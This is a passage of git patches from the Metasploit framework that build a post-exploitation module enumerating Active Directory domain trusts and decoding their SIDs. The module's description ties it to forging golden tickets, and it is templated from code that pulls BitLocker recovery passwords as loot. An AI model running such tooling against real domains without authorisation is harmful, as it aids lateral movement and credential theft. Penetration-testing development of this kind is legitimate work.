"(memberof:1.2.840.113556.1.4.1941:=#{datastore['GROUP_MEMBER']})" if datastore['GROUP_MEMBER'] + inner_filter << "(#{datastore['FILTER']})" if datastore['FILTER'] case datastore['UAC'] when 'ANY' when 'NO_PASSWORD' From ed4cf71ca802d9415721ee2e8fb771274edc272a Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 21:26:02 +0000 Subject: [PATCH 054/686] Initial add (templated from Ben's bitlocker module) --- modules/post/windows/gather/enum_ad_trusts.rb | 78 +++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 modules/post/windows/gather/enum_ad_trusts.rb diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb new file mode 100644 index 0000000000..b18e81cd8b --- /dev/null +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -0,0 +1,78 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' +require 'msf/core/auxiliary/report' + +class Metasploit3 < Msf::Post + include Msf::Auxiliary::Report + include Msf::Post::Windows::LDAP + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Enumerate Active Directory Trusts From Current Domain', + 'Description' => %q{ + This module will enumerate AD trusts from the current domain, including decoding + of the remote SIDs. This could be particularly useful when creating golden tickets + with a SID history, or just to immediately map the available trusts. + }, + 'License' => MSF_LICENSE, + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Author' => ['Stuart Morgan '], + )) + + register_options([ + OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]), + OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']), + OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)']) + ], self.class) + end + + def run + fields = datastore['FIELDS'].gsub(/\s+/, "").split(',') + search_filter = datastore['FILTER'] + max_search = datastore['MAX_SEARCH'] + + begin + q = query(search_filter, max_search, fields) + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error(e.message) + return + end + + if q.nil? || q[:results].empty? + print_status('No results found...') + return + end + + # Results table holds raw string data + results_table = Rex::Ui::Text::Table.new( + 'Header' => 'BitLocker Recovery Passwords', + 'Indent' => 1, + 'SortIndex' => -1, + 'Columns' => fields + ) + + q[:results].each do |result| + row = [] + + result.each do |field| + field_value = (field.nil? ? '' : field[:value]) + row << field_value + end + + results_table << row + end + + print_line results_table.to_s + + if datastore['STORE_LOOT'] + stored_path = store_loot('bitlocker.recovery', 'text/plain', session, results_table.to_csv) + print_status("Results saved to: #{stored_path}") + end + end +end From fdf1a8c23552b7be0439ed8bafa6cdba8a87c087 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 21:39:33 +0000 Subject: [PATCH 055/686] Updated with the LDAP fields to retrieve --- modules/post/windows/gather/enum_ad_trusts.rb | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index b18e81cd8b..4227f3a1ae 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -26,26 +26,25 @@ class Metasploit3 < Msf::Post )) register_options([ - OptBool.new('STORE_LOOT', [true, 'Store file in loot.', true]), - OptString.new('FIELDS', [true, 'FIELDS to retrieve.', 'distinguishedName,msFVE-RecoveryPassword']), - OptString.new('FILTER', [true, 'Search filter.', '(objectClass=msFVE-RecoveryInformation)']) + OptInt.new('MAX_SEARCH', [true, 'Maximum number of items.', '500']) ], self.class) end def run - fields = datastore['FIELDS'].gsub(/\s+/, "").split(',') - search_filter = datastore['FILTER'] + ldap_fields = ['flatname','cn','instanceType','securityIdentifier','trustAttributes','trustDirection','trustType','whenCreated','whenChanged'] + ldap_names = ['Name','Domain','Type','SID','Attributes','Direction','Trust Type','Created','Changed'] + search_filter = '(objectClass=trustedDomain)' max_search = datastore['MAX_SEARCH'] begin - q = query(search_filter, max_search, fields) + trust_results = query(search_filter, max_search, fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error(e.message) return end - if q.nil? || q[:results].empty? - print_status('No results found...') + if trust_results.nil? || trust_results[:results].empty? + print_error('No trusts found.') return end From 087a01f27f34476dbfd448524ae6673c6fd99219 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 21:40:49 +0000 Subject: [PATCH 056/686] Templated table --- modules/post/windows/gather/enum_ad_trusts.rb | 10 +++------- 1 file changed, 3 insertions(+), 7 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 4227f3a1ae..42e3fd6ff2 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -44,16 +44,16 @@ class Metasploit3 < Msf::Post end if trust_results.nil? || trust_results[:results].empty? - print_error('No trusts found.') + print_error('No trusts found') return end # Results table holds raw string data results_table = Rex::Ui::Text::Table.new( - 'Header' => 'BitLocker Recovery Passwords', + 'Header' => 'Domain Trusts', 'Indent' => 1, 'SortIndex' => -1, - 'Columns' => fields + 'Columns' => ldap_names ) q[:results].each do |result| @@ -69,9 +69,5 @@ class Metasploit3 < Msf::Post print_line results_table.to_s - if datastore['STORE_LOOT'] - stored_path = store_loot('bitlocker.recovery', 'text/plain', session, results_table.to_csv) - print_status("Results saved to: #{stored_path}") - end end end From 207a964117ab4d6f021959f874c4b2735e6353a4 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 21:52:30 +0000 Subject: [PATCH 057/686] Loop through results --- modules/post/windows/gather/enum_ad_trusts.rb | 20 ++++++++++++++----- 1 file changed, 15 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 42e3fd6ff2..fc95eb383e 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -22,7 +22,7 @@ class Metasploit3 < Msf::Post 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], - 'Author' => ['Stuart Morgan '], + 'Author' => ['Stuart Morgan '], )) register_options([ @@ -48,25 +48,35 @@ class Metasploit3 < Msf::Post return end - # Results table holds raw string data + num = trust_results[:results].size + + # Draw the results table with the results_table = Rex::Ui::Text::Table.new( - 'Header' => 'Domain Trusts', + 'Header' => "#{num.to_s} Domain Trust" + (num==1)?"":"s", 'Indent' => 1, 'SortIndex' => -1, 'Columns' => ldap_names ) - q[:results].each do |result| + trust_results[:results].each do |result| row = [] - result.each do |field| + # Go through each of the fields translating each one if necessary + result.each_with_index do |field,index| + if field.nil? + field_value = '' + next + end + field_value = (field.nil? ? '' : field[:value]) row << field_value end + # Add the row to the results table results_table << row end + # Draw the whole table print_line results_table.to_s end From 4da8859e57d512397b03d9af9270a6f7f05bf7cf Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:13:00 +0000 Subject: [PATCH 058/686] added trustAttributes --- modules/post/windows/gather/enum_ad_trusts.rb | 32 +++++++++++++++++-- 1 file changed, 29 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index fc95eb383e..13060d3e50 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -31,8 +31,8 @@ class Metasploit3 < Msf::Post end def run - ldap_fields = ['flatname','cn','instanceType','securityIdentifier','trustAttributes','trustDirection','trustType','whenCreated','whenChanged'] - ldap_names = ['Name','Domain','Type','SID','Attributes','Direction','Trust Type','Created','Changed'] + ldap_fields = ['flatname','cn','securityIdentifier','trustAttributes','trustDirection','trustType','whenCreated','whenChanged'] + ldap_names = ['Name','Domain','SID','Attributes','Direction','Trust Type','Created','Changed'] search_filter = '(objectClass=trustedDomain)' max_search = datastore['MAX_SEARCH'] @@ -68,7 +68,14 @@ class Metasploit3 < Msf::Post next end - field_value = (field.nil? ? '' : field[:value]) + if index==3 #trustAttributes + field_value = translate_trustAttributes(field[:value]) + elsif index==4 #trustDirection + field_value = translate_trustDirection(field[:value]) + else + field_value = field[:value].to_s + end + row << field_value end @@ -80,4 +87,23 @@ class Metasploit3 < Msf::Post print_line results_table.to_s end + + + # Translate the trustAttributes parameter + # https://msdn.microsoft.com/en-us/library/cc223779.aspx + def translate_trustAttributes(val) + result = [] + result << 'Non Transitive' if val & 0x00000001 + result << 'Uplevel Only' if val & 0x00000002 + result << 'Quarantined' if val & 0x00000004 + result << 'Transitive' if val & 0x00000008 + result << 'Cross Organisation' if val & 0x00000010 + result << 'Within Forest' if val & 0x00000020 + result << 'Treat As External' if val & 0x00000040 + result << 'Uses RC4 Encryption' if val & 0x00000080 + result << 'No TGT Delegation' if val & 0x00000200 + result << 'PIM Trust' if val & 0x00000400 + return '' unless result.nil? + return result.join(',') + end end From fd8405f52d58d9dc9d6017eed3f174a3cdc07769 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:15:10 +0000 Subject: [PATCH 059/686] added trustDirection --- modules/post/windows/gather/enum_ad_trusts.rb | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 13060d3e50..48aa88c3f7 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -106,4 +106,15 @@ class Metasploit3 < Msf::Post return '' unless result.nil? return result.join(',') end + + # Translate the trustAttributes parameter + # https://msdn.microsoft.com/en-us/library/cc223779.aspx + def translate_trustDirection(val) + result = [] + result = 'Disabled' if val == 0x00000000 + result = 'Inbound' if val == 0x00000001 + result = 'Outbound' if val == 0x00000002 + result = 'Bidirectional' if val == 0x00000003 + return result + end end From fbe0cfde8fa23be18417c2eca590505d329ec6d8 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:16:33 +0000 Subject: [PATCH 060/686] Fixed URL for trustDirection reference --- modules/post/windows/gather/enum_ad_trusts.rb | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 48aa88c3f7..69f1c3c41a 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -72,6 +72,8 @@ class Metasploit3 < Msf::Post field_value = translate_trustAttributes(field[:value]) elsif index==4 #trustDirection field_value = translate_trustDirection(field[:value]) + elsif index==5 #trustType + field_value = translate_trustType(field[:value]) else field_value = field[:value].to_s end @@ -107,6 +109,17 @@ class Metasploit3 < Msf::Post return result.join(',') end + # Translate the trustDirection parameter + # https://msdn.microsoft.com/en-us/library/cc223768.aspx + def translate_trustDirection(val) + result = [] + result = 'Disabled' if val == 0x00000000 + result = 'Inbound' if val == 0x00000001 + result = 'Outbound' if val == 0x00000002 + result = 'Bidirectional' if val == 0x00000003 + return result + end + # Translate the trustAttributes parameter # https://msdn.microsoft.com/en-us/library/cc223779.aspx def translate_trustDirection(val) From 421a29d998f864d44eec2a8d7af5db18e48806ec Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:18:28 +0000 Subject: [PATCH 061/686] Added the trust types from MSDN --- modules/post/windows/gather/enum_ad_trusts.rb | 18 +++++++++--------- 1 file changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 69f1c3c41a..abc1c1b0f4 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Post # Translate the trustDirection parameter # https://msdn.microsoft.com/en-us/library/cc223768.aspx def translate_trustDirection(val) - result = [] + result = '' result = 'Disabled' if val == 0x00000000 result = 'Inbound' if val == 0x00000001 result = 'Outbound' if val == 0x00000002 @@ -120,14 +120,14 @@ class Metasploit3 < Msf::Post return result end - # Translate the trustAttributes parameter - # https://msdn.microsoft.com/en-us/library/cc223779.aspx - def translate_trustDirection(val) - result = [] - result = 'Disabled' if val == 0x00000000 - result = 'Inbound' if val == 0x00000001 - result = 'Outbound' if val == 0x00000002 - result = 'Bidirectional' if val == 0x00000003 + # Translate the trustType parameter + # https://msdn.microsoft.com/en-us/library/cc223771.aspx + def translate_trustType(val) + result = '' + result = 'Downlevel (No AD)' if val == 0x00000001 + result = 'Uplevel (AD)' if val == 0x00000002 + result = 'MIT (Not Windows)' if val == 0x00000003 + result = 'DCE (Historic)' if val == 0x00000004 return result end end From 58635be23716d141dd24e443bd622d77efceed25 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:27:52 +0000 Subject: [PATCH 062/686] Try to unpack the SID from hex to normal cut/paste format. Its a mess. --- modules/post/windows/gather/enum_ad_trusts.rb | 31 +++++++++++++++++-- 1 file changed, 28 insertions(+), 3 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index abc1c1b0f4..00a4169362 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -31,8 +31,8 @@ class Metasploit3 < Msf::Post end def run - ldap_fields = ['flatname','cn','securityIdentifier','trustAttributes','trustDirection','trustType','whenCreated','whenChanged'] - ldap_names = ['Name','Domain','SID','Attributes','Direction','Trust Type','Created','Changed'] + ldap_fields = ['flatname','cn','securityIdentifier','trustAttributes','trustDirection','trustType','whenCreated','whenChanged','distinguishedName'] + ldap_names = ['Name','Domain','SID','Attributes','Direction','Trust Type','Created','Changed','DN'] search_filter = '(objectClass=trustedDomain)' max_search = datastore['MAX_SEARCH'] @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post field_value = translate_trustDirection(field[:value]) elsif index==5 #trustType field_value = translate_trustType(field[:value]) - else + else # Just add the raw data field_value = field[:value].to_s end @@ -130,4 +130,29 @@ class Metasploit3 < Msf::Post result = 'DCE (Historic)' if val == 0x00000004 return result end + + # Convert the SID from Hex to printable string. + # https://msdn.microsoft.com/en-us/library/cc223778.aspx + # Byte [1]: SID structure revision (always 1, but it could change in the future). + # Byte [2]: The number of sub-authorities in the SID. (i.e. the number of blocks from byte 10 onwards) + # Bytes [3-9]: Identifier Authority - convert to hex as the second number group. + # The rest: A variable length list of unsigned 32bit integers, the number of which is defined in byte 2. + # i.e. S-[1]-[3-9]-[10+] < the number of '10+' groups is defined by [2] + def sid_hex_to_string(sidhex) + sid = [] + sid << data[0].to_s + rid = '' + (6).downto(1) do |i| + rid += byte2hex(data[i,1][0]) + end + sid << rid.to_i.to_s + sid += data.unpack("bbbbbbbbV*")[8..-1] + "S-" + sid.join('-') + end + def byte2hex(b) + ret = '%x' % (b.to_i & 0xff) + ret = '0' + ret if ret.length < 2 + ret + end + end From cc3ac3ad9588ece5927bb39a6fd9f7bcbf79c5fe Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:28:27 +0000 Subject: [PATCH 063/686] Removed trailing line spaces --- modules/post/windows/gather/enum_ad_trusts.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 00a4169362..487e48333f 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Post super(update_info(info, 'Name' => 'Enumerate Active Directory Trusts From Current Domain', 'Description' => %q{ - This module will enumerate AD trusts from the current domain, including decoding + This module will enumerate AD trusts from the current domain, including decoding of the remote SIDs. This could be particularly useful when creating golden tickets with a SID history, or just to immediately map the available trusts. }, @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Post num = trust_results[:results].size - # Draw the results table with the + # Draw the results table with the results_table = Rex::Ui::Text::Table.new( 'Header' => "#{num.to_s} Domain Trust" + (num==1)?"":"s", 'Indent' => 1, @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Post # Translate the trustAttributes parameter # https://msdn.microsoft.com/en-us/library/cc223779.aspx - def translate_trustAttributes(val) + def translate_trustAttributes(val) result = [] result << 'Non Transitive' if val & 0x00000001 result << 'Uplevel Only' if val & 0x00000002 @@ -111,7 +111,7 @@ class Metasploit3 < Msf::Post # Translate the trustDirection parameter # https://msdn.microsoft.com/en-us/library/cc223768.aspx - def translate_trustDirection(val) + def translate_trustDirection(val) result = '' result = 'Disabled' if val == 0x00000000 result = 'Inbound' if val == 0x00000001 @@ -122,7 +122,7 @@ class Metasploit3 < Msf::Post # Translate the trustType parameter # https://msdn.microsoft.com/en-us/library/cc223771.aspx - def translate_trustType(val) + def translate_trustType(val) result = '' result = 'Downlevel (No AD)' if val == 0x00000001 result = 'Uplevel (AD)' if val == 0x00000002 @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Post # Convert the SID from Hex to printable string. # https://msdn.microsoft.com/en-us/library/cc223778.aspx - # Byte [1]: SID structure revision (always 1, but it could change in the future). + # Byte [1]: SID structure revision (always 1, but it could change in the future). # Byte [2]: The number of sub-authorities in the SID. (i.e. the number of blocks from byte 10 onwards) # Bytes [3-9]: Identifier Authority - convert to hex as the second number group. # The rest: A variable length list of unsigned 32bit integers, the number of which is defined in byte 2. From 9eef27e4c1270f547500769a9b528bec2dda5904 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:31:22 +0000 Subject: [PATCH 064/686] Removed snake case and added SID translation call --- modules/post/windows/gather/enum_ad_trusts.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 487e48333f..196c86cb52 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -69,11 +69,13 @@ class Metasploit3 < Msf::Post end if index==3 #trustAttributes - field_value = translate_trustAttributes(field[:value]) + field_value = translate_trust_attributes(field[:value]) elsif index==4 #trustDirection - field_value = translate_trustDirection(field[:value]) + field_value = translate_trust_direction(field[:value]) elsif index==5 #trustType - field_value = translate_trustType(field[:value]) + field_value = translate_trust_type(field[:value]) + elsif index==2 #SID + field_value = sid_hex_to_string(field[:value]) else # Just add the raw data field_value = field[:value].to_s end @@ -93,7 +95,7 @@ class Metasploit3 < Msf::Post # Translate the trustAttributes parameter # https://msdn.microsoft.com/en-us/library/cc223779.aspx - def translate_trustAttributes(val) + def translate_trust_attributes(val) result = [] result << 'Non Transitive' if val & 0x00000001 result << 'Uplevel Only' if val & 0x00000002 @@ -111,7 +113,7 @@ class Metasploit3 < Msf::Post # Translate the trustDirection parameter # https://msdn.microsoft.com/en-us/library/cc223768.aspx - def translate_trustDirection(val) + def translate_trust_direction(val) result = '' result = 'Disabled' if val == 0x00000000 result = 'Inbound' if val == 0x00000001 @@ -122,7 +124,7 @@ class Metasploit3 < Msf::Post # Translate the trustType parameter # https://msdn.microsoft.com/en-us/library/cc223771.aspx - def translate_trustType(val) + def translate_trust_type(val) result = '' result = 'Downlevel (No AD)' if val == 0x00000001 result = 'Uplevel (AD)' if val == 0x00000002 From 47e484408f0f13558f17df298512c0733ee4bcd6 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:31:54 +0000 Subject: [PATCH 065/686] rubocop --- modules/post/windows/gather/enum_ad_trusts.rb | 90 +++++++++---------- 1 file changed, 44 insertions(+), 46 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 196c86cb52..5612d3b095 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -13,17 +13,17 @@ class Metasploit3 < Msf::Post def initialize(info = {}) super(update_info(info, - 'Name' => 'Enumerate Active Directory Trusts From Current Domain', - 'Description' => %q{ - This module will enumerate AD trusts from the current domain, including decoding - of the remote SIDs. This could be particularly useful when creating golden tickets - with a SID history, or just to immediately map the available trusts. - }, - 'License' => MSF_LICENSE, - 'Platform' => ['win'], - 'SessionTypes' => ['meterpreter'], - 'Author' => ['Stuart Morgan '], - )) + 'Name' => 'Enumerate Active Directory Trusts From Current Domain', + 'Description' => %q( + This module will enumerate AD trusts from the current domain, including decoding + of the remote SIDs. This could be particularly useful when creating golden tickets + with a SID history, or just to immediately map the available trusts. + ), + 'License' => MSF_LICENSE, + 'Platform' => ['win'], + 'SessionTypes' => ['meterpreter'], + 'Author' => ['Stuart Morgan '] + )) register_options([ OptInt.new('MAX_SEARCH', [true, 'Maximum number of items.', '500']) @@ -31,8 +31,8 @@ class Metasploit3 < Msf::Post end def run - ldap_fields = ['flatname','cn','securityIdentifier','trustAttributes','trustDirection','trustType','whenCreated','whenChanged','distinguishedName'] - ldap_names = ['Name','Domain','SID','Attributes','Direction','Trust Type','Created','Changed','DN'] + ldap_fields = ['flatname', 'cn', 'securityIdentifier', 'trustAttributes', 'trustDirection', 'trustType', 'whenCreated', 'whenChanged', 'distinguishedName'] + ldap_names = ['Name', 'Domain', 'SID', 'Attributes', 'Direction', 'Trust Type', 'Created', 'Changed', 'DN'] search_filter = '(objectClass=trustedDomain)' max_search = datastore['MAX_SEARCH'] @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post # Draw the results table with the results_table = Rex::Ui::Text::Table.new( - 'Header' => "#{num.to_s} Domain Trust" + (num==1)?"":"s", + 'Header' => "#{num} Domain Trust" + (num == 1) ? "" : "s", 'Indent' => 1, 'SortIndex' => -1, 'Columns' => ldap_names @@ -62,22 +62,22 @@ class Metasploit3 < Msf::Post row = [] # Go through each of the fields translating each one if necessary - result.each_with_index do |field,index| + result.each_with_index do |field, index| if field.nil? - field_value = '' - next + field_value = '' + next end - if index==3 #trustAttributes - field_value = translate_trust_attributes(field[:value]) - elsif index==4 #trustDirection - field_value = translate_trust_direction(field[:value]) - elsif index==5 #trustType - field_value = translate_trust_type(field[:value]) - elsif index==2 #SID - field_value = sid_hex_to_string(field[:value]) + if index == 3 # trustAttributes + field_value = translate_trust_attributes(field[:value]) + elsif index == 4 # trustDirection + field_value = translate_trust_direction(field[:value]) + elsif index == 5 # trustType + field_value = translate_trust_type(field[:value]) + elsif index == 2 # SID + field_value = sid_hex_to_string(field[:value]) else # Just add the raw data - field_value = field[:value].to_s + field_value = field[:value].to_s end row << field_value @@ -89,10 +89,8 @@ class Metasploit3 < Msf::Post # Draw the whole table print_line results_table.to_s - end - # Translate the trustAttributes parameter # https://msdn.microsoft.com/en-us/library/cc223779.aspx def translate_trust_attributes(val) @@ -108,7 +106,7 @@ class Metasploit3 < Msf::Post result << 'No TGT Delegation' if val & 0x00000200 result << 'PIM Trust' if val & 0x00000400 return '' unless result.nil? - return result.join(',') + result.join(',') end # Translate the trustDirection parameter @@ -119,7 +117,7 @@ class Metasploit3 < Msf::Post result = 'Inbound' if val == 0x00000001 result = 'Outbound' if val == 0x00000002 result = 'Bidirectional' if val == 0x00000003 - return result + result end # Translate the trustType parameter @@ -130,7 +128,7 @@ class Metasploit3 < Msf::Post result = 'Uplevel (AD)' if val == 0x00000002 result = 'MIT (Not Windows)' if val == 0x00000003 result = 'DCE (Historic)' if val == 0x00000004 - return result + result end # Convert the SID from Hex to printable string. @@ -140,21 +138,21 @@ class Metasploit3 < Msf::Post # Bytes [3-9]: Identifier Authority - convert to hex as the second number group. # The rest: A variable length list of unsigned 32bit integers, the number of which is defined in byte 2. # i.e. S-[1]-[3-9]-[10+] < the number of '10+' groups is defined by [2] - def sid_hex_to_string(sidhex) - sid = [] - sid << data[0].to_s - rid = '' - (6).downto(1) do |i| - rid += byte2hex(data[i,1][0]) - end - sid << rid.to_i.to_s - sid += data.unpack("bbbbbbbbV*")[8..-1] - "S-" + sid.join('-') - end - def byte2hex(b) - ret = '%x' % (b.to_i & 0xff) - ret = '0' + ret if ret.length < 2 - ret + def sid_hex_to_string(_sidhex) + sid = [] + sid << data[0].to_s + rid = '' + (6).downto(1) do |i| + rid += byte2hex(data[i, 1][0]) + end + sid << rid.to_i.to_s + sid += data.unpack("bbbbbbbbV*")[8..-1] + "S-" + sid.join('-') end + def byte2hex(b) + ret = '%x' % (b.to_i & 0xff) + ret = '0' + ret if ret.length < 2 + ret + end end From cba1ddbdc228aa7b9bad4da1498a302945e70c54 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Wed, 16 Dec 2015 22:38:05 +0000 Subject: [PATCH 066/686] rubocop --- modules/post/windows/gather/enum_ad_trusts.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index 5612d3b095..fe92a99688 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Post )) register_options([ - OptInt.new('MAX_SEARCH', [true, 'Maximum number of items.', '500']) + OptInt.new('MAX_SEARCH', [true, 'Maximum number of trusts.', '100']) ], self.class) end @@ -37,7 +37,7 @@ class Metasploit3 < Msf::Post max_search = datastore['MAX_SEARCH'] begin - trust_results = query(search_filter, max_search, fields) + trust_results = query(search_filter, max_search, ldap_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error(e.message) return From 59d5626ef7ac113a8220bf6359d0bee2e78b6196 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 21:36:19 +0000 Subject: [PATCH 067/686] Bugfix --- modules/post/windows/gather/enum_ad_trusts.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index fe92a99688..f39b457795 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -31,8 +31,8 @@ class Metasploit3 < Msf::Post end def run - ldap_fields = ['flatname', 'cn', 'securityIdentifier', 'trustAttributes', 'trustDirection', 'trustType', 'whenCreated', 'whenChanged', 'distinguishedName'] - ldap_names = ['Name', 'Domain', 'SID', 'Attributes', 'Direction', 'Trust Type', 'Created', 'Changed', 'DN'] + ldap_fields = ['flatname', 'cn', 'securityIdentifier', 'trustAttributes', 'trustDirection', 'trustType', 'distinguishedName'] + ldap_names = ['Name', 'Domain', 'SID', 'Attributes', 'Direction', 'Trust Type', 'DN'] search_filter = '(objectClass=trustedDomain)' max_search = datastore['MAX_SEARCH'] @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Post # Draw the results table with the results_table = Rex::Ui::Text::Table.new( - 'Header' => "#{num} Domain Trust" + (num == 1) ? "" : "s", + 'Header' => "#{num} Domain Trust(s)", 'Indent' => 1, 'SortIndex' => -1, 'Columns' => ldap_names @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Post # Bytes [3-9]: Identifier Authority - convert to hex as the second number group. # The rest: A variable length list of unsigned 32bit integers, the number of which is defined in byte 2. # i.e. S-[1]-[3-9]-[10+] < the number of '10+' groups is defined by [2] - def sid_hex_to_string(_sidhex) + def sid_hex_to_string(data) sid = [] sid << data[0].to_s rid = '' From e17a7a5d8c8abea33982dbc797794f7f15907cba Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 21:38:42 +0000 Subject: [PATCH 068/686] Fix attributes --- modules/post/windows/gather/enum_ad_trusts.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/enum_ad_trusts.rb b/modules/post/windows/gather/enum_ad_trusts.rb index f39b457795..da1589077e 100644 --- a/modules/post/windows/gather/enum_ad_trusts.rb +++ b/modules/post/windows/gather/enum_ad_trusts.rb @@ -93,7 +93,8 @@ class Metasploit3 < Msf::Post # Translate the trustAttributes parameter # https://msdn.microsoft.com/en-us/library/cc223779.aspx - def translate_trust_attributes(val) + def translate_trust_attributes(val_original) + val = val_original.to_i result = [] result << 'Non Transitive' if val & 0x00000001 result << 'Uplevel Only' if val & 0x00000002 From 7b019bddf4d7ee4078ac54bf8a8f734aa9e3ad5c Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Thu, 17 Dec 2015 22:14:14 +0000 Subject: [PATCH 069/686] Initial version, just basing it on the ad_users module --- .../windows/gather/ad_groupusers_to_sql.rb | 186 ++++++++++++++++++ 1 file changed, 186 insertions(+) create mode 100644 modules/post/windows/gather/ad_groupusers_to_sql.rb diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb new file mode 100644 index 0000000000..d3daeca3e4 --- /dev/null +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -0,0 +1,186 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'rex' +require 'msf/core' + +class Metasploit3 < Msf::Post + include Msf::Auxiliary::Report + include 